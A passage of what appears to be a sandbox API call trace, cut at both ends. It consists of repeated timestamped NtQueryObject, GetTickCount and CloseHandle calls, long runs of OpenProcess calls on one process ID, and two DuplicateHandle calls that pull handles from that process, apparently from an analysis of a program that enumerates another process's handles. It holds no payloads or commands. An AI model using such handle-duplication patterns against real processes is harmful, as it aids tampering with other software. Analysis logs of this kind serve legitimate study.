Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.486] GetTickCount () returned 0xe8645e [0113.487] GetTickCount () returned 0xe8645e [0113.487] CloseHandle (hObject=0x1b8) returned 1 [0113.487] GetTickCount () returned 0xe8645e [0113.487] GetTickCount () returned 0xe8645e [0113.487] GetTickCount () returned 0xe8645e [0113.487] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.487] GetTickCount () returned 0xe8645e [0113.487] GetTickCount () returned 0xe8645e [0113.487] CloseHandle (hObject=0x1b8) returned 1 [0113.487] GetTickCount () returned 0xe8645e [0113.487] GetTickCount () returned 0xe8645e [0113.487] GetTickCount () returned 0xe8645e [0113.488] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.488] GetTickCount () returned 0xe8645e [0113.488] GetTickCount () returned 0xe8645e [0113.488] CloseHandle (hObject=0x1b8) returned 1 [0113.488] GetTickCount () returned 0xe8645e [0113.488] GetTickCount () returned 0xe8645e [0113.488] GetTickCount () returned 0xe8645e [0113.488] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.488] GetTickCount () returned 0xe8645e [0113.488] GetTickCount () returned 0xe8645e [0113.488] CloseHandle (hObject=0x1b8) returned 1 [0113.488] GetTickCount () returned 0xe8645e [0113.489] GetTickCount () returned 0xe8645e [0113.489] GetTickCount () returned 0xe8645e [0113.489] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.489] GetTickCount () returned 0xe8645e [0113.489] GetTickCount () returned 0xe8645e [0113.489] CloseHandle (hObject=0x1b8) returned 1 [0113.489] GetTickCount () returned 0xe8645e [0113.489] GetTickCount () returned 0xe8645e [0113.489] GetTickCount () returned 0xe8645e [0113.490] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.490] GetTickCount () returned 0xe8645e [0113.490] GetTickCount () returned 0xe8645e [0113.490] CloseHandle (hObject=0x1b8) returned 1 [0113.490] GetTickCount () returned 0xe8645e [0113.490] GetTickCount () returned 0xe8645e [0113.490] GetTickCount () returned 0xe8645e [0113.490] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.490] GetTickCount () returned 0xe8645e [0113.490] GetTickCount () returned 0xe8645e [0113.490] CloseHandle (hObject=0x1b8) returned 1 [0113.490] GetTickCount () returned 0xe8645e [0113.491] GetTickCount () returned 0xe8645e [0113.491] GetTickCount () returned 0xe8645e [0113.491] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.491] GetTickCount () returned 0xe8645e [0113.491] GetTickCount () returned 0xe8645e [0113.491] CloseHandle (hObject=0x1b8) returned 1 [0113.491] GetTickCount () returned 0xe8645e [0113.491] GetTickCount () returned 0xe8645e [0113.491] GetTickCount () returned 0xe8645e [0113.491] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.491] GetTickCount () returned 0xe8645e [0113.492] GetTickCount () returned 0xe8646e [0113.492] CloseHandle (hObject=0x1b8) returned 1 [0113.492] GetTickCount () returned 0xe8646e [0113.492] GetTickCount () returned 0xe8646e [0113.492] GetTickCount () returned 0xe8646e [0113.492] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.497] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.498] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.500] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.501] CloseHandle (hObject=0x1b8) returned 1 [0113.502] CloseHandle (hObject=0x1b8) returned 1 [0113.503] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.503] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.504] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.504] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.504] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.514] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.514] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.626] CloseHandle (hObject=0x198) returned 1 [0113.627] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.627] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.627] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.628] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.628] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.628] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.629] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.629] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.630] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.630] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.631] CloseHandle (hObject=0x198) returned 1 [0113.631] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.631] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.631] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.632] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.648] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.649] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.649] CloseHandle (hObject=0x198) returned 1 [0113.649] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.649] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.650] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.650] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x870, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.650] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.651] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x874, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.651] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.652] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.652] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.652] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.653] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.653] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.653] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.654] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.654] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.655] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.655] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.656] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.656] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.656] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.657] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.657] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.658] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0113.658] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0113.658] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.658] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.659] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.659] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.659] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.660] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.660] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.661] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.661] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.662] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.662] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.662] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.663] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.663] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.682] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.683] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.684] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.685] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.686] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.687] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.688] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.689] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.690] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.691] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.707] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.707] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.707] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.708] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.708] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.709] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.709] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.709] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.710] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.710] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.710] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.711] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.712] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.712] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.712] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.713] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.713] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.713] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.714] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.714] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.715] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.715] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.715] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.716] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.716] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.717] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.717] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.717] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.718] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.718] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.719] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.719] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.719] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.720] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.720] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.720] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.721] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.721] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.722] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.722] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.722] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.723] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.723] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.724] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.724] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.724] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.725] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.725] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.726] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.726] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.726] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.727] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.727] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.728] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.728] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.728] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.729] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.729] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.729] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.730] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.730] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.738] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.739] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.739] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.740] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.740] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.740] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.741] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.741] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.742] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.742] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.742] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.743] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.743] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.743] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.744] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.744] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.744] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.745] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.745] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.745] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.746] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.746] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.746] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.747] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.747] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.748] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.748] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.749] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.749] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.749] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.751] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.752] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.752] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.752] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.753] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.753] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.754] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.754] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.754] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.755] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.755] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.756] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.756] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.756] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.757] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.757] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.757] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.758] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.758] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.759] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.759] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.759] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.760] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.760] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.761] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.761] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.761] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.762] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.762] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.762] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.763] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.763] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.764] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.764] OpenProcess 